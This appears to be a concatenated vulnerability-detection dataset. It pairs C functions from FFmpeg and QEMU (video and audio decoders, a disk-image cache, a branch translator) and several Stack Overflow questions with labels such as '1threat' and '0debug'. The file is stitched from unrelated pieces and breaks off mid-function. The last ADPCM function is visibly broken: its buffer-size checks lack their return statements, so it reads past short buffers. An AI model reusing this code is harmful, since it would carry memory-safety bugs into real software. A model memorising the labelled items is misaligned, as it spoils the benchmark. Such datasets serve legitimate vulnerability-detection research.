level = (2*level+1) * qscale * weigth_matrix[i];
if (weigth_matrix[i] != 32)
level += 32;
level >>= 6;
level = (level^sign) - sign;
if (i > 63) {
av_log(ctx->avctx, AV_LOG_ERROR, "ac tex damaged %d, %d\n", n, i);
return;
}
block[j] = level;
}
}
| 1threat
|
"mov" of "assembly language" meant copy or move? : <p>Recently, I read the C++ of std::mov, and I thought of a question as the title.</p>
<p>Assume initial value following:</p>
<pre><code>int a= 1;
int b= 2;
</code></pre>
<p>I think:</p>
<p><strong>Situation 1,</strong></p>
<p><strong>after move (a <- b):</strong></p>
<pre><code>a= 2 , b=
</code></pre>
<p>b is null because moved</p>
<p><strong>Situation 2,</strong></p>
<p><strong>after copy (a <- b):</strong></p>
<pre><code>a=2 , b=2
</code></pre>
<p>I know std::move of C++ is <strong>Situation 1</strong></p>
<p>Which Situation is <code>mov</code> ( <code>mov %b %a</code> ) of <strong>Assembly lang.</strong>?</p>
<p>This is my question.</p>
| 0debug
|
static int X264_frame(AVCodecContext *ctx, AVPacket *pkt, const AVFrame *frame,
int *got_packet)
{
X264Context *x4 = ctx->priv_data;
x264_nal_t *nal;
int nnal, i, ret;
x264_picture_t pic_out;
x264_picture_init( &x4->pic );
x4->pic.img.i_csp = x4->params.i_csp;
if (x264_bit_depth > 8)
x4->pic.img.i_csp |= X264_CSP_HIGH_DEPTH;
x4->pic.img.i_plane = avfmt2_num_planes(ctx->pix_fmt);
if (frame) {
for (i = 0; i < x4->pic.img.i_plane; i++) {
x4->pic.img.plane[i] = frame->data[i];
x4->pic.img.i_stride[i] = frame->linesize[i];
}
x4->pic.i_pts = frame->pts;
x4->pic.i_type =
frame->pict_type == AV_PICTURE_TYPE_I ? X264_TYPE_KEYFRAME :
frame->pict_type == AV_PICTURE_TYPE_P ? X264_TYPE_P :
frame->pict_type == AV_PICTURE_TYPE_B ? X264_TYPE_B :
X264_TYPE_AUTO;
if (x4->params.b_interlaced && x4->params.b_tff != frame->top_field_first) {
x4->params.b_tff = frame->top_field_first;
x264_encoder_reconfig(x4->enc, &x4->params);
}
if (x4->params.vui.i_sar_height != ctx->sample_aspect_ratio.den ||
x4->params.vui.i_sar_width != ctx->sample_aspect_ratio.num) {
x4->params.vui.i_sar_height = ctx->sample_aspect_ratio.den;
x4->params.vui.i_sar_width = ctx->sample_aspect_ratio.num;
x264_encoder_reconfig(x4->enc, &x4->params);
}
}
do {
if (x264_encoder_encode(x4->enc, &nal, &nnal, frame? &x4->pic: NULL, &pic_out) < 0)
return -1;
ret = encode_nals(ctx, pkt, nal, nnal);
if (ret < 0)
return -1;
} while (!ret && !frame && x264_encoder_delayed_frames(x4->enc));
pkt->pts = pic_out.i_pts;
pkt->dts = pic_out.i_dts;
switch (pic_out.i_type) {
case X264_TYPE_IDR:
case X264_TYPE_I:
x4->out_pic.pict_type = AV_PICTURE_TYPE_I;
break;
case X264_TYPE_P:
x4->out_pic.pict_type = AV_PICTURE_TYPE_P;
break;
case X264_TYPE_B:
case X264_TYPE_BREF:
x4->out_pic.pict_type = AV_PICTURE_TYPE_B;
break;
}
pkt->flags |= AV_PKT_FLAG_KEY*pic_out.b_keyframe;
if (ret)
x4->out_pic.quality = (pic_out.i_qpplus1 - 1) * FF_QP2LAMBDA;
*got_packet = ret;
return 0;
}
| 1threat
|
java over loading,possible return type : We have a method getMessage(), which we wish to overload. What can be the possible valid return type of the overloaded method?
public void hello(String hai)
{
}
Which of the following methods can be added to the definition of class Kid without giving rise to any compilation error?
1.void
2.int
3.String
4.Any return type
| 0debug
|
int qcow2_cache_flush(BlockDriverState *bs, Qcow2Cache *c)
{
BDRVQcow2State *s = bs->opaque;
int result = 0;
int ret;
int i;
trace_qcow2_cache_flush(qemu_coroutine_self(), c == s->l2_table_cache);
for (i = 0; i < c->size; i++) {
ret = qcow2_cache_entry_flush(bs, c, i);
if (ret < 0 && result != -ENOSPC) {
result = ret;
}
}
if (result == 0) {
ret = bdrv_flush(bs->file->bs);
if (ret < 0) {
result = ret;
}
}
return result;
}
| 1threat
|
int avfilter_init_str(AVFilterContext *filter, const char *args)
{
return avfilter_init_filter(filter, args, NULL);
}
| 1threat
|
"Could not find developer disk image" when trying to build : <p>When trying to build on my connected iphone, i get the "Could not find developer disk image" error. I have IOS 10.1 and xcode 7.2.1, but can not update xcode because i have yosemite 10.10.5, and 10.11.5 is required for the new version. What to do then?</p>
| 0debug
|
How do you overwriting bootstrap? : <p>I worked with bootstrap many times and usually I'am creating other style file where I'am overwriting bootstrap classes. I think it's better way to do this. I am also get annoying when I have too much code which I actually don't use in bootstrap source.</p>
<p>What's the best way to overwriting bootstrap classes and remove this parts of code which actually is not needed from bootstrap sources?</p>
| 0debug
|
VBA Code? Filter Table by Column. (Filter --> Filter Between--> Number Range) --> Output New Table : I am trying to use VBA to filter a table by a specific column's values, and then have a new table (filtered) be output on worksheet, but a new area.Note I want to cell referece the range numbers.
On the fake excel table below. I want to filter for range for column 'age'. I.e. filter --> age --> between 1-3 (cell reference). First table is raw data. Second is what I would like as output in new area.
Image of raw data and desired output below
[1]: https://i.stack.imgur.com/XI0xR.png
Links of code similar to what I found, but not the same (either not using range, based on a specific value vs number range, etc). The third has nice code for when my table changes.
https://stackoverflow.com/questions/33896599/using-vba-to-filter-data-between-two-values
https://stackoverflow.com/questions/32332021/how-can-i-filter-a-table-by-column
https://stackoverflow.com/questions/9790924/excel-vba-how-to-select-rows-based-on-data-in-a-column
| 0debug
|
static int tak_decode_frame(AVCodecContext *avctx, void *data,
int *got_frame_ptr, AVPacket *pkt)
{
TAKDecContext *s = avctx->priv_data;
AVFrame *frame = data;
ThreadFrame tframe = { .f = data };
GetBitContext *gb = &s->gb;
int chan, i, ret, hsize;
if (pkt->size < TAK_MIN_FRAME_HEADER_BYTES)
return AVERROR_INVALIDDATA;
if ((ret = init_get_bits8(gb, pkt->data, pkt->size)) < 0)
return ret;
if ((ret = ff_tak_decode_frame_header(avctx, gb, &s->ti, 0)) < 0)
return ret;
if (avctx->err_recognition & (AV_EF_CRCCHECK|AV_EF_COMPLIANT)) {
hsize = get_bits_count(gb) / 8;
if (ff_tak_check_crc(pkt->data, hsize)) {
av_log(avctx, AV_LOG_ERROR, "CRC error\n");
if (avctx->err_recognition & AV_EF_EXPLODE)
return AVERROR_INVALIDDATA;
}
}
if (s->ti.codec != TAK_CODEC_MONO_STEREO &&
s->ti.codec != TAK_CODEC_MULTICHANNEL) {
av_log(avctx, AV_LOG_ERROR, "unsupported codec: %d\n", s->ti.codec);
return AVERROR_PATCHWELCOME;
}
if (s->ti.data_type) {
av_log(avctx, AV_LOG_ERROR,
"unsupported data type: %d\n", s->ti.data_type);
return AVERROR_INVALIDDATA;
}
if (s->ti.codec == TAK_CODEC_MONO_STEREO && s->ti.channels > 2) {
av_log(avctx, AV_LOG_ERROR,
"invalid number of channels: %d\n", s->ti.channels);
return AVERROR_INVALIDDATA;
}
if (s->ti.channels > 6) {
av_log(avctx, AV_LOG_ERROR,
"unsupported number of channels: %d\n", s->ti.channels);
return AVERROR_INVALIDDATA;
}
if (s->ti.frame_samples <= 0) {
av_log(avctx, AV_LOG_ERROR, "unsupported/invalid number of samples\n");
return AVERROR_INVALIDDATA;
}
if (s->ti.bps != avctx->bits_per_raw_sample) {
avctx->bits_per_raw_sample = s->ti.bps;
if ((ret = set_bps_params(avctx)) < 0)
return ret;
}
if (s->ti.sample_rate != avctx->sample_rate) {
avctx->sample_rate = s->ti.sample_rate;
set_sample_rate_params(avctx);
}
if (s->ti.ch_layout)
avctx->channel_layout = s->ti.ch_layout;
avctx->channels = s->ti.channels;
s->nb_samples = s->ti.last_frame_samples ? s->ti.last_frame_samples
: s->ti.frame_samples;
frame->nb_samples = s->nb_samples;
if ((ret = ff_thread_get_buffer(avctx, &tframe, 0)) < 0)
return ret;
ff_thread_finish_setup(avctx);
if (avctx->bits_per_raw_sample <= 16) {
int buf_size = av_samples_get_buffer_size(NULL, avctx->channels,
s->nb_samples,
AV_SAMPLE_FMT_S32P, 0);
av_fast_malloc(&s->decode_buffer, &s->decode_buffer_size, buf_size);
if (!s->decode_buffer)
return AVERROR(ENOMEM);
ret = av_samples_fill_arrays((uint8_t **)s->decoded, NULL,
s->decode_buffer, avctx->channels,
s->nb_samples, AV_SAMPLE_FMT_S32P, 0);
if (ret < 0)
return ret;
} else {
for (chan = 0; chan < avctx->channels; chan++)
s->decoded[chan] = (int32_t *)frame->extended_data[chan];
}
if (s->nb_samples < 16) {
for (chan = 0; chan < avctx->channels; chan++) {
int32_t *decoded = s->decoded[chan];
for (i = 0; i < s->nb_samples; i++)
decoded[i] = get_sbits(gb, avctx->bits_per_raw_sample);
}
} else {
if (s->ti.codec == TAK_CODEC_MONO_STEREO) {
for (chan = 0; chan < avctx->channels; chan++)
if (ret = decode_channel(s, chan))
return ret;
if (avctx->channels == 2) {
s->nb_subframes = get_bits(gb, 1) + 1;
if (s->nb_subframes > 1) {
s->subframe_len[1] = get_bits(gb, 6);
}
s->dmode = get_bits(gb, 3);
if (ret = decorrelate(s, 0, 1, s->nb_samples - 1))
return ret;
}
} else if (s->ti.codec == TAK_CODEC_MULTICHANNEL) {
if (get_bits1(gb)) {
int ch_mask = 0;
chan = get_bits(gb, 4) + 1;
if (chan > avctx->channels)
return AVERROR_INVALIDDATA;
for (i = 0; i < chan; i++) {
int nbit = get_bits(gb, 4);
if (nbit >= avctx->channels)
return AVERROR_INVALIDDATA;
if (ch_mask & 1 << nbit)
return AVERROR_INVALIDDATA;
s->mcdparams[i].present = get_bits1(gb);
if (s->mcdparams[i].present) {
s->mcdparams[i].index = get_bits(gb, 2);
s->mcdparams[i].chan2 = get_bits(gb, 4);
if (s->mcdparams[i].index == 1) {
if ((nbit == s->mcdparams[i].chan2) ||
(ch_mask & 1 << s->mcdparams[i].chan2))
return AVERROR_INVALIDDATA;
ch_mask |= 1 << s->mcdparams[i].chan2;
} else if (!(ch_mask & 1 << s->mcdparams[i].chan2)) {
return AVERROR_INVALIDDATA;
}
}
s->mcdparams[i].chan1 = nbit;
ch_mask |= 1 << nbit;
}
} else {
chan = avctx->channels;
for (i = 0; i < chan; i++) {
s->mcdparams[i].present = 0;
s->mcdparams[i].chan1 = i;
}
}
for (i = 0; i < chan; i++) {
if (s->mcdparams[i].present && s->mcdparams[i].index == 1)
if (ret = decode_channel(s, s->mcdparams[i].chan2))
return ret;
if (ret = decode_channel(s, s->mcdparams[i].chan1))
return ret;
if (s->mcdparams[i].present) {
s->dmode = mc_dmodes[s->mcdparams[i].index];
if (ret = decorrelate(s,
s->mcdparams[i].chan2,
s->mcdparams[i].chan1,
s->nb_samples - 1))
return ret;
}
}
}
for (chan = 0; chan < avctx->channels; chan++) {
int32_t *decoded = s->decoded[chan];
if (s->lpc_mode[chan])
decode_lpc(decoded, s->lpc_mode[chan], s->nb_samples);
if (s->sample_shift[chan] > 0)
for (i = 0; i < s->nb_samples; i++)
decoded[i] <<= s->sample_shift[chan];
}
}
align_get_bits(gb);
skip_bits(gb, 24);
if (get_bits_left(gb) < 0)
av_log(avctx, AV_LOG_DEBUG, "overread\n");
else if (get_bits_left(gb) > 0)
av_log(avctx, AV_LOG_DEBUG, "underread\n");
if (avctx->err_recognition & (AV_EF_CRCCHECK | AV_EF_COMPLIANT)) {
if (ff_tak_check_crc(pkt->data + hsize,
get_bits_count(gb) / 8 - hsize)) {
av_log(avctx, AV_LOG_ERROR, "CRC error\n");
if (avctx->err_recognition & AV_EF_EXPLODE)
return AVERROR_INVALIDDATA;
}
}
switch (avctx->sample_fmt) {
case AV_SAMPLE_FMT_U8P:
for (chan = 0; chan < avctx->channels; chan++) {
uint8_t *samples = (uint8_t *)frame->extended_data[chan];
int32_t *decoded = s->decoded[chan];
for (i = 0; i < s->nb_samples; i++)
samples[i] = decoded[i] + 0x80;
}
break;
case AV_SAMPLE_FMT_S16P:
for (chan = 0; chan < avctx->channels; chan++) {
int16_t *samples = (int16_t *)frame->extended_data[chan];
int32_t *decoded = s->decoded[chan];
for (i = 0; i < s->nb_samples; i++)
samples[i] = decoded[i];
}
break;
case AV_SAMPLE_FMT_S32P:
for (chan = 0; chan < avctx->channels; chan++) {
int32_t *samples = (int32_t *)frame->extended_data[chan];
for (i = 0; i < s->nb_samples; i++)
samples[i] <<= 8;
}
break;
}
*got_frame_ptr = 1;
return pkt->size;
}
| 1threat
|
Determining which overload was selected : <p>Let's say I have some arbitrary complicated overloaded function:</p>
<pre><code>template <class T> void foo(T&& );
template <class T> void foo(T* );
void foo(int );
</code></pre>
<p>I want to know, for a given expression, <em>which</em> <code>foo()</code> gets called. For example, given some macro <code>WHICH_OVERLOAD</code>:</p>
<pre><code>using T = WHICH_OVERLOAD(foo, 0); // T is void(*)(int);
using U = WHICH_OVERLOAD(foo, "hello"); // U is void(*)(const char*);
// etc.
</code></pre>
<p>I don't know where I would use such a thing - I'm just curious if it's possible. </p>
| 0debug
|
static inline void gen_bcond(DisasContext *ctx, int type)
{
uint32_t bo = BO(ctx->opcode);
int l1;
TCGv target;
ctx->exception = POWERPC_EXCP_BRANCH;
if (type == BCOND_LR || type == BCOND_CTR || type == BCOND_TAR) {
target = tcg_temp_local_new();
if (type == BCOND_CTR)
tcg_gen_mov_tl(target, cpu_ctr);
else if (type == BCOND_TAR)
gen_load_spr(target, SPR_TAR);
else
tcg_gen_mov_tl(target, cpu_lr);
} else {
TCGV_UNUSED(target);
}
if (LK(ctx->opcode))
gen_setlr(ctx, ctx->nip);
l1 = gen_new_label();
if ((bo & 0x4) == 0) {
TCGv temp = tcg_temp_new();
if (unlikely(type == BCOND_CTR)) {
gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL);
return;
}
tcg_gen_subi_tl(cpu_ctr, cpu_ctr, 1);
if (NARROW_MODE(ctx)) {
tcg_gen_ext32u_tl(temp, cpu_ctr);
} else {
tcg_gen_mov_tl(temp, cpu_ctr);
}
if (bo & 0x2) {
tcg_gen_brcondi_tl(TCG_COND_NE, temp, 0, l1);
} else {
tcg_gen_brcondi_tl(TCG_COND_EQ, temp, 0, l1);
}
tcg_temp_free(temp);
}
if ((bo & 0x10) == 0) {
uint32_t bi = BI(ctx->opcode);
uint32_t mask = 1 << (3 - (bi & 0x03));
TCGv_i32 temp = tcg_temp_new_i32();
if (bo & 0x8) {
tcg_gen_andi_i32(temp, cpu_crf[bi >> 2], mask);
tcg_gen_brcondi_i32(TCG_COND_EQ, temp, 0, l1);
} else {
tcg_gen_andi_i32(temp, cpu_crf[bi >> 2], mask);
tcg_gen_brcondi_i32(TCG_COND_NE, temp, 0, l1);
}
tcg_temp_free_i32(temp);
}
gen_update_cfar(ctx, ctx->nip);
if (type == BCOND_IM) {
target_ulong li = (target_long)((int16_t)(BD(ctx->opcode)));
if (likely(AA(ctx->opcode) == 0)) {
gen_goto_tb(ctx, 0, ctx->nip + li - 4);
} else {
gen_goto_tb(ctx, 0, li);
}
gen_set_label(l1);
gen_goto_tb(ctx, 1, ctx->nip);
} else {
if (NARROW_MODE(ctx)) {
tcg_gen_andi_tl(cpu_nip, target, (uint32_t)~3);
} else {
tcg_gen_andi_tl(cpu_nip, target, ~3);
}
tcg_gen_exit_tb(0);
gen_set_label(l1);
gen_update_nip(ctx, ctx->nip);
tcg_gen_exit_tb(0);
}
if (type == BCOND_LR || type == BCOND_CTR) {
tcg_temp_free(target);
}
}
| 1threat
|
How to create page curl effect : <p>I want to apply a page curl transformation to PageView's pages similar to the attached screenshots.</p>
<p>Here you can see a video of the effect: <a href="https://www.youtube.com/watch?v=JqvtZwIJMLo" rel="noreferrer">https://www.youtube.com/watch?v=JqvtZwIJMLo</a></p>
<p><a href="https://i.stack.imgur.com/ZKMg4.png" rel="noreferrer"><img src="https://i.stack.imgur.com/ZKMg4.png" alt="page curl previews"></a></p>
<p><a href="https://i.stack.imgur.com/4qtyn.png" rel="noreferrer"><img src="https://i.stack.imgur.com/4qtyn.png" alt="last page curl"></a></p>
<p>Not sure if this is possible to reproduce in Flutter by just applying a transformation matrix because as you can see it's using a <strong>A*sin(2*π/wav*x)</strong> equation.</p>
| 0debug
|
How to get the common index of two pandas dataframes? : <p>I have two pandas DataFrames df1 and df2 and I want to transform them in order that they keep values only for the index that are common to the 2 dataframes.</p>
<p><em>df1</em></p>
<pre><code> values 1
0
28/11/2000 -0.055276
29/11/2000 0.027427
30/11/2000 0.066009
01/12/2000 0.012749
04/12/2000 0.113892
</code></pre>
<p><em>df2</em></p>
<pre><code> values 2
24/11/2000 -0.004808
27/11/2000 -0.001812
28/11/2000 -0.026316
29/11/2000 0.015222
30/11/2000 -0.024480
</code></pre>
<p>become</p>
<p><em>df1</em></p>
<pre><code> value 1
28/11/2000 -0.055276
29/11/2000 0.027427
30/11/2000 0.066009
</code></pre>
<p><em>df2</em></p>
<pre><code> value 2
28/11/2000 -0.026316
29/11/2000 0.015222
30/11/2000 -0.024480
</code></pre>
| 0debug
|
Convert CSV file to Excel format in VB2012 : <p>I have a csv file created by my VB application and I want to convert it to Excel format (.xlsx).
Can please anybody help me with that issue?</p>
| 0debug
|
static int matroska_parse_laces(MatroskaDemuxContext *matroska, uint8_t **buf,
int size, int type,
uint32_t **lace_buf, int *laces)
{
int res = 0, n;
uint8_t *data = *buf;
uint32_t *lace_size;
if (!type) {
*laces = 1;
*lace_buf = av_mallocz(sizeof(int));
if (!*lace_buf)
return AVERROR(ENOMEM);
*lace_buf[0] = size;
return 0;
}
assert(size > 0);
*laces = *data + 1;
data += 1;
size -= 1;
lace_size = av_mallocz(*laces * sizeof(int));
if (!lace_size)
return AVERROR(ENOMEM);
switch (type) {
case 0x1: {
uint8_t temp;
uint32_t total = 0;
for (n = 0; res == 0 && n < *laces - 1; n++) {
while (1) {
if (size == 0) {
res = AVERROR_EOF;
break;
}
temp = *data;
lace_size[n] += temp;
data += 1;
size -= 1;
if (temp != 0xff)
break;
}
total += lace_size[n];
}
if (size <= total) {
res = AVERROR_INVALIDDATA;
break;
}
lace_size[n] = size - total;
break;
}
case 0x2:
if (size != (size / *laces) * size) {
res = AVERROR_INVALIDDATA;
break;
}
for (n = 0; n < *laces; n++)
lace_size[n] = size / *laces;
break;
case 0x3: {
uint64_t num;
uint32_t total;
n = matroska_ebmlnum_uint(matroska, data, size, &num);
if (n < 0) {
av_log(matroska->ctx, AV_LOG_INFO,
"EBML block data error\n");
res = n;
break;
}
data += n;
size -= n;
total = lace_size[0] = num;
for (n = 1; res == 0 && n < *laces - 1; n++) {
int64_t snum;
int r;
r = matroska_ebmlnum_sint(matroska, data, size, &snum);
if (r < 0) {
av_log(matroska->ctx, AV_LOG_INFO,
"EBML block data error\n");
res = r;
break;
}
data += r;
size -= r;
lace_size[n] = lace_size[n - 1] + snum;
total += lace_size[n];
}
if (size <= total) {
res = AVERROR_INVALIDDATA;
break;
}
lace_size[*laces - 1] = size - total;
break;
}
}
*buf = data;
*lace_buf = lace_size;
return res;
}
| 1threat
|
R: split rows into different rows : <p>Say I have a data frame like the following:</p>
<pre><code>> mydf <- data.frame(a=c('A','B','C','D/E','F','G/H','I/J','K','L'), b=c(1,2,3,'4/5',6,'7/8','9/10',11,12))
> mydf
a b
1 A 1
2 B 2
3 C 3
4 D/E 4/5
5 F 6
6 G/H 7/8
7 I/J 9/10
8 K 11
9 L 12
</code></pre>
<p>How do I make it look like the following, with an easy one-liner (preferably base)? Thanks</p>
<pre><code>> mydf2
a b
1 A 1
2 B 2
3 C 3
4 D 4
5 E 5
6 F 6
7 G 7
8 H 8
9 I 9
10 J 10
11 K 11
12 L 12
</code></pre>
| 0debug
|
Android Studio: Use two SetOnClickListener in the MainActivity : I am developing an Android app. The topic is a cost manager.
I want to use two SetOnClickListener in the mainactivity for two buttons.
The first button change the view to a secound page (activity). And on this page there is a secound button, which just print out an log message.
But the app break down and do not throw an error message. The failure has to be in the secound onClickListener, because without it, it works.
Here is my sourcecode. Please help me.
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
// Init all Elements
Button btn_hinzufügen = (Button) findViewById(R.id.btn_add);
Button btn_speichern = (Button) findViewById(R.id.btn_speichern);
btn_hinzufügen.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
open_add_data();
}
});
btn_speichern.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Log.i("Info", "Say Hello");
}
});
}
public void open_add_data() {
setContentView(R.layout.add_data);
}
}
| 0debug
|
static int walk_memory_regions_1(struct walk_memory_regions_data *data,
abi_ulong base, int level, void **lp)
{
abi_ulong pa;
int i, rc;
if (*lp == NULL) {
return walk_memory_regions_end(data, base, 0);
}
if (level == 0) {
PageDesc *pd = *lp;
for (i = 0; i < L2_SIZE; ++i) {
int prot = pd[i].flags;
pa = base | (i << TARGET_PAGE_BITS);
if (prot != data->prot) {
rc = walk_memory_regions_end(data, pa, prot);
if (rc != 0) {
return rc;
}
}
}
} else {
void **pp = *lp;
for (i = 0; i < L2_SIZE; ++i) {
pa = base | ((abi_ulong)i <<
(TARGET_PAGE_BITS + L2_BITS * level));
rc = walk_memory_regions_1(data, pa, level - 1, pp + i);
if (rc != 0) {
return rc;
}
}
}
return 0;
}
| 1threat
|
Hot to get index path for existing object in collection view : <p>I got an array with objects, and populate the collection view with them. For example I have 3 objects inside my collection view. Is there a way, to receive the current index path based on the object name?</p>
<p>Thanks</p>
| 0debug
|
HOW TO SAVE DATA WITH SHARED PREFERENCES IN A FRAGMENT : 1. Hi, I'm having a problem with saving data permanently. It should be simple, I'm sending data to another fragment and it works perfectly, however, I nearly have no idea how to save data.
2. So is this, but now follows a code block:
/*package com.example.mskydraw.notetech;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.annotation.Nullable;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.app.Activity;
import android.widget.Button;
import android.widget.EditText;
public class Cofo extends Fragment {
private static EditText Txt;
TopSectionListener activityCommander;
public interface TopSectionListener{
public void createMeme(String top);
};
@Override
public void onAttach(Activity activity) {
super.onAttach(activity);
try {
activityCommander = (TopSectionListener) activity;
}catch (ClassCastException e){
throw new ClassCastException(activity.toString());
}
}
@Override
public View onCreateView(LayoutInflater inflater,@Nullable
ViewGroup container, @Nullable
Bundle savedInstanceState) {
// Inflate the layout for this fragment
View view = inflater.inflate(R.layout.fragment_cofo,
container,false);
Txt = (EditText) view.findViewById(R.id.Txt);
final Button Btn = (Button) view.findViewById(R.id.Btn);
Btn.setOnClickListener(
new View.OnClickListener(){
public void onClick(View v){
buttonClicked(v);
};
}
);
return view;
}
// call this whenever the button is clicked!
public void buttonClicked(View view){
activityCommander.createMeme(Txt.getText().toString());
};
} */
package com.example.mskydraw.notetech;
import android.content.Context;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Gallery;
import android.widget.TextView;
import android.widget.Toast;
import java.io.FileOutputStream;
import static android.content.Context.MODE_PRIVATE;
/**
* A simple {@link Fragment} subclass.
*/
public class Cofo extends Fragment {
final static String SHARED_NAME_STRING="sharedp";
final static String USER_NAME_STRING="user";
public Cofo() {
// Required empty public constructor
}
EditText newTxt;
Button newBtn;
SharedPreferences sharedPreferences;
Context c = getActivity();
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
// Inflate the layout for this fragment
View view = inflater.inflate(R.layout.fragment_cofo, container, false);
// finding my bouton and text on layout
newTxt = (EditText)view.findViewById(R.id.Txt);
newBtn = (Button)view.findViewById(R.id.Btn);
sharedPreferences=this.c.getSharedPreferences(SHARED_NAME_STRING,Context.MODE_PRIVATE);
String userNameString=sharedPreferences.getString(USER_NAME_STRING, "");
newTxt.setText(userNameString);
// whenever I click on the bouton
newBtn.setOnClickListener(new View.OnClickListener(){
@Override
public void onClick(View v){
//This code allows you to jump into another fragment
// Call the fragment to where I want to jump
Main_content newmain = new Main_content();
//Here we are going to learn to how to save data
String Message = newTxt.getText().toString();
String file_name = "Hello_file";
// Create an object output string
//here we are sending data to another fragment
//You have declare bundle
Bundle bundle = new Bundle();
// You can use bundle.putxx everything such as String...float..
bundle.putInt("N1",5);
//calling the fragment I'm going to send the data
// and I'm going to send data I saved on bundle.
newmain.setArguments(bundle);
// The process of declaration fragment
FragmentManager manager = getFragmentManager();
// Jumping into main content fragment
manager.beginTransaction().replace(R.id.fragment,newmain).commit();
if (newTxt.getText().toString().equals("Hello")){
Toast.makeText(Cofo.this.getActivity(), "true", Toast.LENGTH_SHORT).show();
}
else{
Toast.makeText(Cofo.this.getActivity(), "Hi", Toast.LENGTH_SHORT).show();
}
SharedPreferences.Editor editor=sharedPreferences.edit();
}
});
return view;
}
}
| 0debug
|
How to Solve: Error:Execution failed for task ':app:transformClassesWithInstantRunForDebug' : <p>The full error is this</p>
<p>Error:Execution failed for task ':app:transformClassesWithInstantRunForDebug'.</p>
<blockquote>
<p>java.lang.IllegalStateException: Expected BEGIN_ARRAY but was STRING at line 1 column 1 path $</p>
</blockquote>
<p>I made a small change to my project on Android Studio, tried to run it and it crashed my PC, it was completely frozen for a couple of minutes, first time this has happened while compiling on AS (I didn't use the ADB) when my PC restarts I get the error </p>
<p>Error:null value in entry: blameLogFolder=null</p>
<p>Results tell me to delete the .gradle foldier of my project, so I do that and when I run it again I get this new error.</p>
<p>I have no clue what's wrong or even how to fix it, and extra help online was no help.</p>
<p>Everything was working perfectly fine 10 minutes ago and now the project won't compile, I can't even make an apk.</p>
| 0debug
|
QFloat *qobject_to_qfloat(const QObject *obj)
{
if (qobject_type(obj) != QTYPE_QFLOAT)
return NULL;
return container_of(obj, QFloat, base);
}
| 1threat
|
Generating specific output patterns from a Python tuple : Given a Python tuple
products = (a, b, c, d, e, f, g)
I seek to generate a new tuple/list from 'products', but according to specific patterns:
1. all possible chronological combinations to make pairs e.g. ab, ac...af, ag, bc, and so on
2. similar to #1, but making sets of three and making sure the increment change to either side of the 'middle' product is equal e.g. abc, bcd, cde, def *and* ace, bdf, ceg
3. sets of four, again making sure that the increment change is equal to either side (and between) middle products e.g. abcd, bcde … aceg
From asking around and reading on Python's site, the itertools.combinations() function seemed a step in the right direction. But given the specific patterns being sought for creation, seems more than just that function in its standard usage form is needed. Any suggestions?
P.S. the *average* actual tuple is several times longer than the example above (I'll have about 40 tuples total), and some 'products' within each will expire/drop out and new ones added every few weeks, so manually entering the combinations into new tuples isn't in keeping with the aims of automation.
| 0debug
|
document.getElementById('input').innerHTML = user_input;
| 1threat
|
wmic is not recognized as an internal or external command, operable program or batch file : <p>I'm trying to get my motherboard's serial number through the following command in windows 10 cmd: </p>
<pre><code>wmic baseboard get serialnumber
</code></pre>
<p>but I receive this Error:</p>
<pre><code>wmic is not recognized as an internal or external command, operable program or batch file
</code></pre>
<p>while, this command works on other systems of mine (for example my office pc). What may be wrong with it?</p>
| 0debug
|
Why do some websites duplicate their background images, to fill the screen size, rather than upload a larger image in the first place? : <p>For the past few days, I have been looking at the various ways websites upload background images to their website via CSS.</p>
<p>When it comes to images which can be duplicated endlessly, such as plain stripes, I have noticed that some websites upload a small 'sample' of the image and then duplicate it with a CSS input such as <code>background-repeat: repeat-x;</code> rather than uploading a larger version which scales according to screen size.</p>
<p>Is this, primarily, a page load speed optimisation exercise, or is there another reason why somebody may wish to do this other than due to the original image being small in the first place?</p>
| 0debug
|
can' display cinder nova and neutron infos in horizon dashboard : i started to work on openstack , and have installed it on ubuntu, and after all configuration I've some problem displaying cinder & nova & neutron services on horizon [enter image description here][1] " error impossible to get information on nova , cinder , neutron"
[1]: http://i.stack.imgur.com/4MglV.png
| 0debug
|
static int get_nb_samples(AVCodecContext *avctx, const uint8_t *buf,
int buf_size, int *coded_samples)
{
ADPCMDecodeContext *s = avctx->priv_data;
int nb_samples = 0;
int ch = avctx->channels;
int has_coded_samples = 0;
int header_size;
*coded_samples = 0;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_EA_XAS:
if (buf_size < 76 * ch)
nb_samples = 128;
break;
case CODEC_ID_ADPCM_IMA_QT:
if (buf_size < 34 * ch)
nb_samples = 64;
break;
case CODEC_ID_ADPCM_CT:
case CODEC_ID_ADPCM_IMA_EA_SEAD:
case CODEC_ID_ADPCM_IMA_WS:
case CODEC_ID_ADPCM_YAMAHA:
nb_samples = buf_size * 2 / ch;
break;
}
if (nb_samples)
return nb_samples;
header_size = 0;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_4XM:
case CODEC_ID_ADPCM_IMA_ISS: header_size = 4 * ch; break;
case CODEC_ID_ADPCM_IMA_AMV: header_size = 8; break;
case CODEC_ID_ADPCM_IMA_SMJPEG: header_size = 4; break;
}
if (header_size > 0)
return (buf_size - header_size) * 2 / ch;
switch (avctx->codec->id) {
case CODEC_ID_ADPCM_EA:
has_coded_samples = 1;
if (buf_size < 4)
*coded_samples = AV_RL32(buf);
*coded_samples -= *coded_samples % 28;
nb_samples = (buf_size - 12) / 30 * 28;
break;
case CODEC_ID_ADPCM_IMA_EA_EACS:
has_coded_samples = 1;
if (buf_size < 4)
*coded_samples = AV_RL32(buf);
nb_samples = (buf_size - (4 + 8 * ch)) * 2 / ch;
break;
case CODEC_ID_ADPCM_EA_MAXIS_XA:
nb_samples = ((buf_size - ch) / (2 * ch)) * 2 * ch;
break;
case CODEC_ID_ADPCM_EA_R1:
case CODEC_ID_ADPCM_EA_R2:
case CODEC_ID_ADPCM_EA_R3:
has_coded_samples = 1;
if (buf_size < 4)
switch (avctx->codec->id) {
